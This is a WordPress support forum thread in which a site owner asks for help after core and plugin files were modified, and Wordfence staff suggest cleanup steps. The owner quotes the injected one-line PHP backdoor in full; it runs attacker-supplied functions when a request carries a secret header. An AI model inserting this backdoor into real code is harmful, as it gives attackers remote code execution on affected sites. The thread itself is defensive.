Files Being Modified With Following Code

Resolved himagarwal
(@himagarwal)

11 years, 5 months ago

One of my website was compromised. Since it only had like 5 pages. I saved all the pages text and completely deleted the files & database and installed everything from start. I also changed database username, pass but didn’t change addon/ftp pass.

After installing wordfence, sucuri & acunetix wp security and configuring these plugins i thought i have pretty secured my website. Site is hosted in HostGator.

But to my surprise within like 24 hours 4 of my core files where modified

Critical Problems:
* WordPress core file modified: wp-admin/edit-form-advanced.php
* WordPress core file modified: wp-includes/date.php
* WordPress core file modified: wp-includes/ms-default-filters.php

Warnings:
* Modified plugin file: wp-content/plugins/add-tags-and-category-to-page/includes/tcp_footer.php

When checked through wordfence showed that all file has an added line at the top of the which is:

<?php if(@md5($_SERVER[‘HTTP_PATH’])===’5cd2973f835de94b560b62465d5a37f3′){ @extract($_REQUEST); @die($stime($mtime)); } ?>

I am pretty sure this is a hack, but I am not getting how they are getting through my site when everything is up-to-date, all freely available plugins has only been installed (nothing privacy of any sort).

Also, can someone decode that code… what is it about… and how can i protect the site… i am really concerned..though i have now also changed the ftp/addon password

please help me!

https://ww.wp.xz.cn/plugins/wordfence/

Viewing 5 replies - 1 through 5 (of 5 total)

WFBrian
(@wfbrian)

11 years, 5 months ago

The default FTP password looks like the original vulnerability to me. You’ll definitely want to get rid of that line of code. Run another scan. Wordfence should give you the option to repair the file.

http://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

Thanks,
Brian

Thread Starter himagarwal
(@himagarwal)

11 years, 5 months ago

Thank you for your reply Brian!

I was not using default FTP password created by cPanel. I had FTP/addon password set to something of my own alpha-numeric like a year ago. (I think the default cPanel password would be more tough to break as it uses special characters in a wild manner.)

I did everything from scratch – new files, new database, new database user/pass, new wp user / login details etc. but I didn’t changed FTP pass. So, maybe you are correct regarding hack via FTP but I still doubt it..

Though, now I have changed FTP password & cPanel password. I’ve shared hosting at HostGator. I’ll let you know if weird things doesn’t happen in coming days!

WFSupport
(@wfsupport)

11 years, 5 months ago

Also make sure and check the option to “scan images as executable”. I bet theres something in your uploads folder.

tim

Thread Starter himagarwal
(@himagarwal)

11 years, 5 months ago

Thank you Tim for replying.

I did checked “scan images as executable” earlier but nothing came up, so I went through the files manually and didn’t find anything suspicious, but I cannot confirm this; but I do feel that it was not done via that way.

Haven’t encountered anything yet till now after that; so MAYBE sites are secured now.

Regards,
Himanshu

WFSupport
(@wfsupport)

11 years, 5 months ago

We hope so too. 🙂

I’ll mark this resolved for the present. Feel free to reopen or open a new post if problems show up again.

tim

Viewing 5 replies - 1 through 5 (of 5 total)

The topic ‘Files Being Modified With Following Code’ is closed to new replies.

Tags